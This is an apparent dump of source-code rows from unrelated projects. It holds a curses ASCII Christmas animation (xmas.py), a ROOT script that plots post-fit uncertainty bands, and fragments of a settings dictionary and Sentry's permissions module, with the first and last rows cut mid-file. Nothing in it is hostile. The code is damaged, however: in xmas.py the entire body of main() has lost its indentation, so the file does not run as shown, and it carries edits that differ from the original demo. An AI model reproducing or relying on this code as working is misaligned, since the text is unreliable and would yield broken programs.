                    'name': 'nfo_name',
                    'label': 'NFO naming',
                    'default': '<filename>.orig.<ext>',
                    'type': 'choice',
                    'options': rename_options
                },
            ],
        },
    ],
}]
| gpl-3.0 |
dennis-sheil/commandergenius | project/jni/python/src/Demo/curses/xmas.py | 34 | 25499 | # asciixmas
# December 1989 Larry Bartz Indianapolis, IN
#
# $Id: xmas.py 46623 2006-06-03 22:59:23Z andrew.kuchling $
#
# I'm dreaming of an ascii character-based monochrome Christmas,
# Just like the ones I used to know!
# Via a full duplex communications channel,
# At 9600 bits per second,
# Even though it's kinda slow.
#
# I'm dreaming of an ascii character-based monochrome Christmas,
# With ev'ry C program I write!
# May your screen be merry and bright!
# And may all your Christmases be amber or green,
# (for reduced eyestrain and improved visibility)!
#
#
# Notes on the Python version:
# I used a couple of `try...except curses.error' to get around some functions
# returning ERR. The errors come from using wrapping functions to fill
# windows to the last character cell. The C version doesn't have this problem,
# it simply ignores any return values.
#
import curses
import sys
FROMWHO = "Thomas Gellekum <tg@FreeBSD.org>"
def set_color(win, color):
    """Switch *win* to the colour pair for *color* (no-op on mono terminals)."""
    if not curses.has_colors():
        return
    pair = color + 1
    curses.init_pair(pair, color, my_bg)
    win.attroff(curses.A_COLOR)
    win.attron(curses.color_pair(pair))
def unset_color(win):
    """Restore *win* to the default colour pair (no-op on mono terminals)."""
    if not curses.has_colors():
        return
    win.attrset(curses.color_pair(0))
def look_out(msecs):
    # Sleep for `msecs` milliseconds; if the user pressed any key in the
    # meantime (stdscr is in nodelay mode, so getch() returns -1 when no
    # key is pending), beep and terminate the whole program.
    curses.napms(msecs)
    if stdscr.getch() != -1:
        curses.beep()
        sys.exit(0)
def boxit():
    """Draw the static frame: a left wall plus two horizontal rules."""
    # Vertical wall down column 7.
    for row in range(20):
        stdscr.addch(row, 7, ord('|'))
    # Ground line to the right of the wall.
    for col in range(8, 80):
        stdscr.addch(19, col, ord('_'))
    # Full-width rule above the status area.
    for col in range(80):
        stdscr.addch(22, col, ord('_'))
def seas():
    """Spell "SEASON'S" down column 1, one letter every other row (4..18)."""
    for row, letter in zip(range(4, 19, 2), "SEASON'S"):
        stdscr.addch(row, 1, ord(letter))
def greet():
    """Spell "GREETINGS" down column 5, one letter every other row (3..19)."""
    for row, letter in zip(range(3, 20, 2), "GREETINGS"):
        stdscr.addch(row, 5, ord(letter))
def fromwho():
    # Sign the greeting with the maintainer's address on the bottom rule.
    stdscr.addstr(21, 13, FROMWHO)
    return
def tree():
    """Draw the bare (unlit) green tree outline on ``treescrn``."""
    set_color(treescrn, curses.COLOR_GREEN)
    # Left edge of the tree, drawn with '/'.
    left_edge = ((1, 11), (2, 11), (3, 10), (4, 9), (5, 9), (6, 8),
                 (7, 7), (8, 6), (9, 6), (10, 5), (11, 3), (12, 2))
    # Right edge of the tree, drawn with '\'.
    right_edge = ((1, 13), (2, 13), (3, 14), (4, 15), (5, 15), (6, 16),
                  (7, 17), (8, 18), (9, 18), (10, 19), (11, 21), (12, 22))
    # Branch tips, drawn with '_'.
    tips = ((4, 10), (4, 14), (8, 7), (8, 17))
    for y, x in left_edge:
        treescrn.addch(y, x, ord('/'))
    for y, x in right_edge:
        treescrn.addch(y, x, ord('\\'))
    for y, x in tips:
        treescrn.addch(y, x, ord('_'))
    # Skirt and trunk.
    treescrn.addstr(13, 0, "//////////// \\\\\\\\\\\\\\\\\\\\\\\\")
    treescrn.addstr(14, 11, "| |")
    treescrn.addstr(15, 11, "|_|")
    unset_color(treescrn)
    treescrn.refresh()
    w_del_msg.refresh()
def balls():
    """Hang the ornaments ('@') on a copy of the tree in ``treescrn2``."""
    treescrn.overlay(treescrn2)
    set_color(treescrn2, curses.COLOR_BLUE)
    ornament_cells = ((3, 9), (3, 15), (4, 8), (4, 16), (5, 7), (5, 17),
                      (7, 6), (7, 18), (8, 5), (8, 19), (10, 4), (10, 20),
                      (11, 2), (11, 22), (12, 1), (12, 23))
    for y, x in ornament_cells:
        treescrn2.addch(y, x, ord('@'))
    unset_color(treescrn2)
    treescrn2.refresh()
    w_del_msg.refresh()
def star():
    # Put a bold, blinking yellow star on the tree top (row 0, centre).
    treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
    set_color(treescrn2, curses.COLOR_YELLOW)
    treescrn2.addch(0, 12, ord('*'))
    # standend() clears all attributes (unlike the attroff used elsewhere).
    treescrn2.standend()
    unset_color(treescrn2)
    treescrn2.refresh()
    w_del_msg.refresh()
    return
def strng1():
    """Light the first (topmost) string of blinking white lights."""
    treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
    set_color(treescrn2, curses.COLOR_WHITE)
    for y, x, ch in ((3, 13, "'"), (3, 12, ':'), (3, 11, '.')):
        treescrn2.addch(y, x, ord(ch))
    treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
    unset_color(treescrn2)
    treescrn2.refresh()
    w_del_msg.refresh()
def strng2():
    """Light the second string of blinking white lights."""
    treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
    set_color(treescrn2, curses.COLOR_WHITE)
    cells = ((5, 14, "'"), (5, 13, ':'), (5, 12, '.'), (5, 11, ','),
             (6, 10, "'"), (6, 9, ':'))
    for y, x, ch in cells:
        treescrn2.addch(y, x, ord(ch))
    treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
    unset_color(treescrn2)
    treescrn2.refresh()
    w_del_msg.refresh()
def strng3():
    """Light the third string of blinking white lights."""
    treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
    set_color(treescrn2, curses.COLOR_WHITE)
    cells = ((7, 16, "'"), (7, 15, ':'), (7, 14, '.'), (7, 13, ','),
             (8, 12, "'"), (8, 11, ':'), (8, 10, '.'), (8, 9, ','))
    for y, x, ch in cells:
        treescrn2.addch(y, x, ord(ch))
    treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
    unset_color(treescrn2)
    treescrn2.refresh()
    w_del_msg.refresh()
def strng4():
    """Light the fourth string of blinking white lights."""
    treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
    set_color(treescrn2, curses.COLOR_WHITE)
    cells = ((9, 17, "'"), (9, 16, ':'), (9, 15, '.'), (9, 14, ','),
             (10, 13, "'"), (10, 12, ':'), (10, 11, '.'), (10, 10, ','),
             (11, 9, "'"), (11, 8, ':'), (11, 7, '.'), (11, 6, ','),
             (12, 5, "'"))
    for y, x, ch in cells:
        treescrn2.addch(y, x, ord(ch))
    treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
    unset_color(treescrn2)
    treescrn2.refresh()
    w_del_msg.refresh()
def strng5():
    """Light the fifth (bottom) string, then save the fully lit tree."""
    treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
    set_color(treescrn2, curses.COLOR_WHITE)
    cells = ((11, 19, "'"), (11, 18, ':'), (11, 17, '.'), (11, 16, ','),
             (12, 15, "'"), (12, 14, ':'), (12, 13, '.'), (12, 12, ','))
    for y, x, ch in cells:
        treescrn2.addch(y, x, ord(ch))
    treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
    unset_color(treescrn2)
    # save a fully lit tree
    treescrn2.overlay(treescrn)
    treescrn2.refresh()
    w_del_msg.refresh()
def blinkit():
    """Blink the tree lights: show each partially-lit frame in turn, then
    the fully lit tree.

    Bug fix: the original C ``switch``/``break`` was ported literally, but
    in Python ``break`` exits the ``for`` loop, so only ``treescrn3`` (the
    ``cycle == 0`` case) was ever displayed and frames treescrn4..treescrn7
    were unreachable.  Iterating over the frames directly restores the
    intended five-frame cycle.
    """
    treescrn8.touchwin()
    for frame in (treescrn3, treescrn4, treescrn5, treescrn6, treescrn7):
        frame.overlay(treescrn8)
        treescrn8.refresh()
        w_del_msg.refresh()
    treescrn8.touchwin()
    # ALL ON
    treescrn.overlay(treescrn8)
    treescrn8.refresh()
    w_del_msg.refresh()
    return
def deer_step(win, y, x):
    # Move the reindeer sprite window to (y, x), repaint it, and pause
    # 5 ms (look_out also exits the program if a key was pressed).
    win.mvwin(y, x)
    win.refresh()
    w_del_msg.refresh()
    look_out(5)
def reindeer():
    # Animate Santa's approach: a distant dot, then a star, then small,
    # medium and big deer sprites crossing the screen toward the tree.
    y_pos = 0
    # Far away: a flickering dot drifting left along the top.
    for x_pos in range(70, 62, -1):
        if x_pos < 66: y_pos = 1
        for looper in range(0, 4):
            dotdeer0.addch(y_pos, x_pos, ord('.'))
            dotdeer0.refresh()
            w_del_msg.refresh()
            dotdeer0.erase()
            dotdeer0.refresh()
            w_del_msg.refresh()
            look_out(50)
    y_pos = 2
    # Closer: the dot becomes a star.
    # NOTE: intentionally reuses x_pos left over from the loop above.
    for x_pos in range(x_pos - 1, 50, -1):
        for looper in range(0, 4):
            if x_pos < 56:
                y_pos = 3
                try:
                    stardeer0.addch(y_pos, x_pos, ord('*'))
                except curses.error:
                    pass
                stardeer0.refresh()
                w_del_msg.refresh()
                stardeer0.erase()
                stardeer0.refresh()
                w_del_msg.refresh()
            else:
                dotdeer0.addch(y_pos, x_pos, ord('*'))
                dotdeer0.refresh()
                w_del_msg.refresh()
                dotdeer0.erase()
                dotdeer0.refresh()
                w_del_msg.refresh()
    x_pos = 58
    # Small deer galloping down-left; lildeer1..3 are alternating leg frames.
    for y_pos in range(2, 5):
        lildeer0.touchwin()
        lildeer0.refresh()
        w_del_msg.refresh()
        for looper in range(0, 4):
            deer_step(lildeer3, y_pos, x_pos)
            deer_step(lildeer2, y_pos, x_pos)
            deer_step(lildeer1, y_pos, x_pos)
            deer_step(lildeer2, y_pos, x_pos)
            deer_step(lildeer3, y_pos, x_pos)
        lildeer0.touchwin()
        lildeer0.refresh()
        w_del_msg.refresh()
        x_pos -= 2
    x_pos = 35
    # Medium deer, same three-frame gallop.
    for y_pos in range(5, 10):
        middeer0.touchwin()
        middeer0.refresh()
        w_del_msg.refresh()
        for looper in range(2):
            deer_step(middeer3, y_pos, x_pos)
            deer_step(middeer2, y_pos, x_pos)
            deer_step(middeer1, y_pos, x_pos)
            deer_step(middeer2, y_pos, x_pos)
            deer_step(middeer3, y_pos, x_pos)
        middeer0.touchwin()
        middeer0.refresh()
        w_del_msg.refresh()
        x_pos -= 3
    look_out(300)
    y_pos = 1
    # Big deer crossing the top of the screen left to right.
    for x_pos in range(8, 16):
        deer_step(bigdeer4, y_pos, x_pos)
        deer_step(bigdeer3, y_pos, x_pos)
        deer_step(bigdeer2, y_pos, x_pos)
        deer_step(bigdeer1, y_pos, x_pos)
        deer_step(bigdeer2, y_pos, x_pos)
        deer_step(bigdeer3, y_pos, x_pos)
        deer_step(bigdeer4, y_pos, x_pos)
        deer_step(bigdeer0, y_pos, x_pos)
    x_pos -= 1
    # The deer stops and looks around (lookdeer frames).
    for looper in range(0, 6):
        deer_step(lookdeer4, y_pos, x_pos)
        deer_step(lookdeer3, y_pos, x_pos)
        deer_step(lookdeer2, y_pos, x_pos)
        deer_step(lookdeer1, y_pos, x_pos)
        deer_step(lookdeer2, y_pos, x_pos)
        deer_step(lookdeer3, y_pos, x_pos)
        deer_step(lookdeer4, y_pos, x_pos)
    deer_step(lookdeer0, y_pos, x_pos)
    # Then trots down toward the bottom of the screen.
    for y_pos in range(y_pos, 10):
        for looper in range(0, 2):
            deer_step(bigdeer4, y_pos, x_pos)
            deer_step(bigdeer3, y_pos, x_pos)
            deer_step(bigdeer2, y_pos, x_pos)
            deer_step(bigdeer1, y_pos, x_pos)
            deer_step(bigdeer2, y_pos, x_pos)
            deer_step(bigdeer3, y_pos, x_pos)
            deer_step(bigdeer4, y_pos, x_pos)
        deer_step(bigdeer0, y_pos, x_pos)
    y_pos -= 1
    deer_step(lookdeer3, y_pos, x_pos)
    return
def main(win):
global stdscr
stdscr = win
global my_bg, y_pos, x_pos
global treescrn, treescrn2, treescrn3, treescrn4
global treescrn5, treescrn6, treescrn7, treescrn8
global dotdeer0, stardeer0
global lildeer0, lildeer1, lildeer2, lildeer3
global middeer0, middeer1, middeer2, middeer3
global bigdeer0, bigdeer1, bigdeer2, bigdeer3, bigdeer4
global lookdeer0, lookdeer1, lookdeer2, lookdeer3, lookdeer4
global w_holiday, w_del_msg
my_bg = curses.COLOR_BLACK
# curses.curs_set(0)
treescrn = curses.newwin(16, 27, 3, 53)
treescrn2 = curses.newwin(16, 27, 3, 53)
treescrn3 = curses.newwin(16, 27, 3, 53)
treescrn4 = curses.newwin(16, 27, 3, 53)
treescrn5 = curses.newwin(16, 27, 3, 53)
treescrn6 = curses.newwin(16, 27, 3, 53)
treescrn7 = curses.newwin(16, 27, 3, 53)
treescrn8 = curses.newwin(16, 27, 3, 53)
dotdeer0 = curses.newwin(3, 71, 0, 8)
stardeer0 = curses.newwin(4, 56, 0, 8)
lildeer0 = curses.newwin(7, 53, 0, 8)
lildeer1 = curses.newwin(2, 4, 0, 0)
lildeer2 = curses.newwin(2, 4, 0, 0)
lildeer3 = curses.newwin(2, 4, 0, 0)
middeer0 = curses.newwin(15, 42, 0, 8)
middeer1 = curses.newwin(3, 7, 0, 0)
middeer2 = curses.newwin(3, 7, 0, 0)
middeer3 = curses.newwin(3, 7, 0, 0)
bigdeer0 = curses.newwin(10, 23, 0, 0)
bigdeer1 = curses.newwin(10, 23, 0, 0)
bigdeer2 = curses.newwin(10, 23, 0, 0)
bigdeer3 = curses.newwin(10, 23, 0, 0)
bigdeer4 = curses.newwin(10, 23, 0, 0)
lookdeer0 = curses.newwin(10, 25, 0, 0)
lookdeer1 = curses.newwin(10, 25, 0, 0)
lookdeer2 = curses.newwin(10, 25, 0, 0)
lookdeer3 = curses.newwin(10, 25, 0, 0)
lookdeer4 = curses.newwin(10, 25, 0, 0)
w_holiday = curses.newwin(1, 27, 3, 27)
w_del_msg = curses.newwin(1, 20, 23, 60)
try:
w_del_msg.addstr(0, 0, "Hit any key to quit")
except curses.error:
pass
try:
w_holiday.addstr(0, 0, "H A P P Y H O L I D A Y S")
except curses.error:
pass
# set up the windows for our various reindeer
lildeer1.addch(0, 0, ord('V'))
lildeer1.addch(1, 0, ord('@'))
lildeer1.addch(1, 1, ord('<'))
lildeer1.addch(1, 2, ord('>'))
try:
lildeer1.addch(1, 3, ord('~'))
except curses.error:
pass
lildeer2.addch(0, 0, ord('V'))
lildeer2.addch(1, 0, ord('@'))
lildeer2.addch(1, 1, ord('|'))
lildeer2.addch(1, 2, ord('|'))
try:
lildeer2.addch(1, 3, ord('~'))
except curses.error:
pass
lildeer3.addch(0, 0, ord('V'))
lildeer3.addch(1, 0, ord('@'))
lildeer3.addch(1, 1, ord('>'))
lildeer3.addch(1, 2, ord('<'))
try:
lildeer2.addch(1, 3, ord('~')) # XXX
except curses.error:
pass
middeer1.addch(0, 2, ord('y'))
middeer1.addch(0, 3, ord('y'))
middeer1.addch(1, 2, ord('0'))
middeer1.addch(1, 3, ord('('))
middeer1.addch(1, 4, ord('='))
middeer1.addch(1, 5, ord(')'))
middeer1.addch(1, 6, ord('~'))
middeer1.addch(2, 3, ord('\\'))
middeer1.addch(2, 5, ord('/'))
middeer2.addch(0, 2, ord('y'))
middeer2.addch(0, 3, ord('y'))
middeer2.addch(1, 2, ord('0'))
middeer2.addch(1, 3, ord('('))
middeer2.addch(1, 4, ord('='))
middeer2.addch(1, 5, ord(')'))
middeer2.addch(1, 6, ord('~'))
middeer2.addch(2, 3, ord('|'))
middeer2.addch(2, 5, ord('|'))
middeer3.addch(0, 2, ord('y'))
middeer3.addch(0, 3, ord('y'))
middeer3.addch(1, 2, ord('0'))
middeer3.addch(1, 3, ord('('))
middeer3.addch(1, 4, ord('='))
middeer3.addch(1, 5, ord(')'))
middeer3.addch(1, 6, ord('~'))
middeer3.addch(2, 3, ord('/'))
middeer3.addch(2, 5, ord('\\'))
bigdeer1.addch(0, 17, ord('\\'))
bigdeer1.addch(0, 18, ord('/'))
bigdeer1.addch(0, 19, ord('\\'))
bigdeer1.addch(0, 20, ord('/'))
bigdeer1.addch(1, 18, ord('\\'))
bigdeer1.addch(1, 20, ord('/'))
bigdeer1.addch(2, 19, ord('|'))
bigdeer1.addch(2, 20, ord('_'))
bigdeer1.addch(3, 18, ord('/'))
bigdeer1.addch(3, 19, ord('^'))
bigdeer1.addch(3, 20, ord('0'))
bigdeer1.addch(3, 21, ord('\\'))
bigdeer1.addch(4, 17, ord('/'))
bigdeer1.addch(4, 18, ord('/'))
bigdeer1.addch(4, 19, ord('\\'))
bigdeer1.addch(4, 22, ord('\\'))
bigdeer1.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer1.addstr(6, 7, "( \\_____( /") # ))
bigdeer1.addstr(7, 8, "( ) /")
bigdeer1.addstr(8, 9, "\\\\ /")
bigdeer1.addstr(9, 11, "\\>/>")
bigdeer2.addch(0, 17, ord('\\'))
bigdeer2.addch(0, 18, ord('/'))
bigdeer2.addch(0, 19, ord('\\'))
bigdeer2.addch(0, 20, ord('/'))
bigdeer2.addch(1, 18, ord('\\'))
bigdeer2.addch(1, 20, ord('/'))
bigdeer2.addch(2, 19, ord('|'))
bigdeer2.addch(2, 20, ord('_'))
bigdeer2.addch(3, 18, ord('/'))
bigdeer2.addch(3, 19, ord('^'))
bigdeer2.addch(3, 20, ord('0'))
bigdeer2.addch(3, 21, ord('\\'))
bigdeer2.addch(4, 17, ord('/'))
bigdeer2.addch(4, 18, ord('/'))
bigdeer2.addch(4, 19, ord('\\'))
bigdeer2.addch(4, 22, ord('\\'))
bigdeer2.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer2.addstr(6, 7, "(( )____( /") # ))
bigdeer2.addstr(7, 7, "( / |")
bigdeer2.addstr(8, 8, "\\/ |")
bigdeer2.addstr(9, 9, "|> |>")
bigdeer3.addch(0, 17, ord('\\'))
bigdeer3.addch(0, 18, ord('/'))
bigdeer3.addch(0, 19, ord('\\'))
bigdeer3.addch(0, 20, ord('/'))
bigdeer3.addch(1, 18, ord('\\'))
bigdeer3.addch(1, 20, ord('/'))
bigdeer3.addch(2, 19, ord('|'))
bigdeer3.addch(2, 20, ord('_'))
bigdeer3.addch(3, 18, ord('/'))
bigdeer3.addch(3, 19, ord('^'))
bigdeer3.addch(3, 20, ord('0'))
bigdeer3.addch(3, 21, ord('\\'))
bigdeer3.addch(4, 17, ord('/'))
bigdeer3.addch(4, 18, ord('/'))
bigdeer3.addch(4, 19, ord('\\'))
bigdeer3.addch(4, 22, ord('\\'))
bigdeer3.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer3.addstr(6, 6, "( ()_____( /") # ))
bigdeer3.addstr(7, 6, "/ / /")
bigdeer3.addstr(8, 5, "|/ \\")
bigdeer3.addstr(9, 5, "/> \\>")
bigdeer4.addch(0, 17, ord('\\'))
bigdeer4.addch(0, 18, ord('/'))
bigdeer4.addch(0, 19, ord('\\'))
bigdeer4.addch(0, 20, ord('/'))
bigdeer4.addch(1, 18, ord('\\'))
bigdeer4.addch(1, 20, ord('/'))
bigdeer4.addch(2, 19, ord('|'))
bigdeer4.addch(2, 20, ord('_'))
bigdeer4.addch(3, 18, ord('/'))
bigdeer4.addch(3, 19, ord('^'))
bigdeer4.addch(3, 20, ord('0'))
bigdeer4.addch(3, 21, ord('\\'))
bigdeer4.addch(4, 17, ord('/'))
bigdeer4.addch(4, 18, ord('/'))
bigdeer4.addch(4, 19, ord('\\'))
bigdeer4.addch(4, 22, ord('\\'))
bigdeer4.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer4.addstr(6, 6, "( )______( /") # )
bigdeer4.addstr(7, 5, "(/ \\") # )
bigdeer4.addstr(8, 0, "v___= ----^")
lookdeer1.addstr(0, 16, "\\/ \\/")
lookdeer1.addstr(1, 17, "\\Y/ \\Y/")
lookdeer1.addstr(2, 19, "\\=/")
lookdeer1.addstr(3, 17, "^\\o o/^")
lookdeer1.addstr(4, 17, "//( )")
lookdeer1.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer1.addstr(6, 7, "( \\_____( /") # ))
lookdeer1.addstr(7, 8, "( ) /")
lookdeer1.addstr(8, 9, "\\\\ /")
lookdeer1.addstr(9, 11, "\\>/>")
lookdeer2.addstr(0, 16, "\\/ \\/")
lookdeer2.addstr(1, 17, "\\Y/ \\Y/")
lookdeer2.addstr(2, 19, "\\=/")
lookdeer2.addstr(3, 17, "^\\o o/^")
lookdeer2.addstr(4, 17, "//( )")
lookdeer2.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer2.addstr(6, 7, "(( )____( /") # ))
lookdeer2.addstr(7, 7, "( / |")
lookdeer2.addstr(8, 8, "\\/ |")
lookdeer2.addstr(9, 9, "|> |>")
lookdeer3.addstr(0, 16, "\\/ \\/")
lookdeer3.addstr(1, 17, "\\Y/ \\Y/")
lookdeer3.addstr(2, 19, "\\=/")
lookdeer3.addstr(3, 17, "^\\o o/^")
lookdeer3.addstr(4, 17, "//( )")
lookdeer3.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer3.addstr(6, 6, "( ()_____( /") # ))
lookdeer3.addstr(7, 6, "/ / /")
lookdeer3.addstr(8, 5, "|/ \\")
lookdeer3.addstr(9, 5, "/> \\>")
lookdeer4.addstr(0, 16, "\\/ \\/")
lookdeer4.addstr(1, 17, "\\Y/ \\Y/")
lookdeer4.addstr(2, 19, "\\=/")
lookdeer4.addstr(3, 17, "^\\o o/^")
lookdeer4.addstr(4, 17, "//( )")
lookdeer4.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer4.addstr(6, 6, "( )______( /") # )
lookdeer4.addstr(7, 5, "(/ \\") # )
lookdeer4.addstr(8, 0, "v___= ----^")
###############################################
curses.cbreak()
stdscr.nodelay(1)
while 1:
stdscr.clear()
treescrn.erase()
w_del_msg.touchwin()
treescrn.touchwin()
treescrn2.erase()
treescrn2.touchwin()
treescrn8.erase()
treescrn8.touchwin()
stdscr.refresh()
look_out(150)
boxit()
stdscr.refresh()
look_out(150)
seas()
stdscr.refresh()
greet()
stdscr.refresh()
look_out(150)
fromwho()
stdscr.refresh()
look_out(150)
tree()
look_out(150)
balls()
look_out(150)
star()
look_out(150)
strng1()
strng2()
strng3()
strng4()
strng5()
# set up the windows for our blinking trees
#
# treescrn3
treescrn.overlay(treescrn3)
# balls
treescrn3.addch(4, 18, ord(' '))
treescrn3.addch(7, 6, ord(' '))
treescrn3.addch(8, 19, ord(' '))
treescrn3.addch(11, 22, ord(' '))
# star
treescrn3.addch(0, 12, ord('*'))
# strng1
treescrn3.addch(3, 11, ord(' '))
# strng2
treescrn3.addch(5, 13, ord(' '))
treescrn3.addch(6, 10, ord(' '))
# strng3
treescrn3.addch(7, 16, ord(' '))
treescrn3.addch(7, 14, ord(' '))
# strng4
treescrn3.addch(10, 13, ord(' '))
treescrn3.addch(10, 10, ord(' '))
treescrn3.addch(11, 8, ord(' '))
# strng5
treescrn3.addch(11, 18, ord(' '))
treescrn3.addch(12, 13, ord(' '))
# treescrn4
treescrn.overlay(treescrn4)
# balls
treescrn4.addch(3, 9, ord(' '))
treescrn4.addch(4, 16, ord(' '))
treescrn4.addch(7, 6, ord(' '))
treescrn4.addch(8, 19, ord(' '))
treescrn4.addch(11, 2, ord(' '))
treescrn4.addch(12, 23, ord(' '))
# star
treescrn4.standout()
treescrn4.addch(0, 12, ord('*'))
treescrn4.standend()
# strng1
treescrn4.addch(3, 13, ord(' '))
# strng2
# strng3
treescrn4.addch(7, 15, ord(' '))
treescrn4.addch(8, 11, ord(' '))
# strng4
treescrn4.addch(9, 16, ord(' '))
treescrn4.addch(10, 12, ord(' '))
treescrn4.addch(11, 8, ord(' '))
# strng5
treescrn4.addch(11, 18, ord(' '))
treescrn4.addch(12, 14, ord(' '))
# treescrn5
treescrn.overlay(treescrn5)
# balls
treescrn5.addch(3, 15, ord(' '))
treescrn5.addch(10, 20, ord(' '))
treescrn5.addch(12, 1, ord(' '))
# star
treescrn5.addch(0, 12, ord(' '))
# strng1
treescrn5.addch(3, 11, ord(' '))
# strng2
treescrn5.addch(5, 12, ord(' '))
# strng3
treescrn5.addch(7, 14, ord(' '))
treescrn5.addch(8, 10, ord(' '))
# strng4
treescrn5.addch(9, 15, ord(' '))
treescrn5.addch(10, 11, ord(' '))
treescrn5.addch(11, 7, ord(' '))
# strng5
treescrn5.addch(11, 17, ord(' '))
treescrn5.addch(12, 13, ord(' '))
# treescrn6
treescrn.overlay(treescrn6)
# balls
treescrn6.addch(6, 7, ord(' '))
treescrn6.addch(7, 18, ord(' '))
treescrn6.addch(10, 4, ord(' '))
treescrn6.addch(11, 23, ord(' '))
# star
treescrn6.standout()
treescrn6.addch(0, 12, ord('*'))
treescrn6.standend()
# strng1
# strng2
treescrn6.addch(5, 11, ord(' '))
# strng3
treescrn6.addch(7, 13, ord(' '))
treescrn6.addch(8, 9, ord(' '))
# strng4
treescrn6.addch(9, 14, ord(' '))
treescrn6.addch(10, 10, ord(' '))
treescrn6.addch(11, 6, ord(' '))
# strng5
treescrn6.addch(11, 16, ord(' '))
treescrn6.addch(12, 12, ord(' '))
# treescrn7
treescrn.overlay(treescrn7)
# balls
treescrn7.addch(3, 15, ord(' '))
treescrn7.addch(6, 7, ord(' '))
treescrn7.addch(7, 18, ord(' '))
treescrn7.addch(10, 4, ord(' '))
treescrn7.addch(11, 22, ord(' '))
# star
treescrn7.addch(0, 12, ord('*'))
# strng1
treescrn7.addch(3, 12, ord(' '))
# strng2
treescrn7.addch(5, 13, ord(' '))
treescrn7.addch(6, 9, ord(' '))
# strng3
treescrn7.addch(7, 15, ord(' '))
treescrn7.addch(8, 11, ord(' '))
# strng4
treescrn7.addch(9, 16, ord(' '))
treescrn7.addch(10, 12, ord(' '))
treescrn7.addch(11, 8, ord(' '))
# strng5
treescrn7.addch(11, 18, ord(' '))
treescrn7.addch(12, 14, ord(' '))
look_out(150)
reindeer()
w_holiday.touchwin()
w_holiday.refresh()
w_del_msg.refresh()
look_out(500)
for i in range(0, 20):
blinkit()
curses.wrapper(main)
| lgpl-2.1 |
yukisakurai/hhana | statstools/tests/test_finalfit_uncerband_plot.py | 5 | 2790 | from array import array
import rootpy
import ROOT
rootpy.log.basic_config_colorized()
from rootpy.io import root_open
from rootpy.plotting import Canvas,Graph
from rootpy.plotting import set_style
from statstools.finalfit_uncertband_plot import getPostFitPlottingObjects
from statstools.finalfit_uncertband_plot import UncertGraph
set_style('ATLAS')
# ------------------------------
def Fit_WS(workspace):
    """
    Fit the WS and compute the histograms and TGraphAssymErrors
    for the final plotting drawing

    Parameters
    ----------
    workspace : RooWorkspace
        HSG4 like workspace

    Side effects: writes all post-fit plotting objects to 'frames.root'
    in the current directory (overwriting any existing file).
    """
    # --> Get the Model Config object
    mc = workspace.obj("ModelConfig")
    if not mc:
        raise RuntimeError('Could not retrieve the ModelConfig object')
    # Fix the parameter of interest (signal strength) to 1 before fitting.
    mc.GetParametersOfInterest().first().setVal(1)
    # fit_res = 0
    roo_min = workspace.fit()
    fit_res = roo_min.save()
    fit_res.Print()
    # --> Get the data distribution
    obsData = workspace.data('obsData')
    if not obsData:
        raise RuntimeError('Could not retrieve the data histograms')
    # --> Get the simultaneous PDF
    simPdf = mc.GetPdf()
    if not simPdf:
        raise RuntimeError('Could not retrieve the simultaneous pdf')
    # Build the post-fit frames/curves and persist them for the driver below.
    plotting_objects = getPostFitPlottingObjects(mc,obsData,simPdf,fit_res)
    out_file = ROOT.TFile('frames.root','RECREATE')
    for obj in plotting_objects:
        obj.Write()
    out_file.Close()
# ------------------------------------------------------------------------
# ------- MAIN DRIVER --------------
# ------------------------------------------------------------------------
# The commented-out lines below fit a workspace and regenerate
# 'frames.root'; the live code assumes that file already exists.
# rfile = root_open( '../../../workspaces_comparison/workspaces/mva/ws_measurement_hh_combination_125.root')
# ws = rfile.Get('combined')
# Fit_WS(ws)
# rfile = root_open( '../../workspaces/hh_combination_mva_125_v1/ws_measurement_hh_combination_125.root')
# ws = rfile.Get( 'combined' )
# Fit_WS(ws)
# channel_name = 'channel_boosted_125'
channel_name = 'channel_vbf_125_12'
# Load the post-fit frame and histograms produced by Fit_WS for one channel.
frame_file = root_open('frames.root')
frame = frame_file.Get(channel_name)
hbkg_plus_sig = frame_file.Get('hbkg_plus_sig_'+channel_name)
hbkg = frame_file.Get('hbkg_'+channel_name)
hbkg.SetLineColor(ROOT.kRed)
# Background-only (mu=0) uncertainty band.
curve_uncert = frame.getCurve( 'FitError_AfterFit_Mu0' )
graph = UncertGraph(hbkg, curve_uncert)
# Background+signal uncertainty band.
curve_uncert_sig = frame.getCurve('FitError_AfterFit')
graph_sig = UncertGraph( hbkg_plus_sig, curve_uncert_sig )
graph.fillstyle='solid'
graph.SetFillColor(ROOT.kRed-7)
graph.SetLineColor(ROOT.kRed)
graph.SetMarkerColor(ROOT.kRed)
# Draw histograms over their error bands and save the canvas.
c = Canvas()
c.cd()
# c.SetLogy()
hbkg.Draw('HIST')
graph.Draw('sameE2')
graph_sig.Draw( 'sameE2')
hbkg.Draw('SAMEHIST')
hbkg_plus_sig.Draw('SAMEHIST')
c.SaveAs('toto.png')
| gpl-3.0 |
simmetria/sentry | src/sentry/permissions.py | 2 | 4737 | """
sentry.permissions
~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from functools import wraps
from sentry.conf import settings
from sentry.constants import MEMBER_OWNER
from sentry.plugins import plugins
def perm_override(perm):
    """Decorator factory: short-circuit a permission check to ``True`` when
    the user holds the explicit ``sentry.<perm>`` Django permission,
    otherwise defer to the wrapped check.
    """
    def decorator(func):
        @wraps(func)
        def wrapper(user, *args, **kwargs):
            # permissions always take precedence
            if user.has_perm('sentry.' + perm):
                return True
            return func(user, *args, **kwargs)
        return wrapper
    return decorator
def requires_login(func):
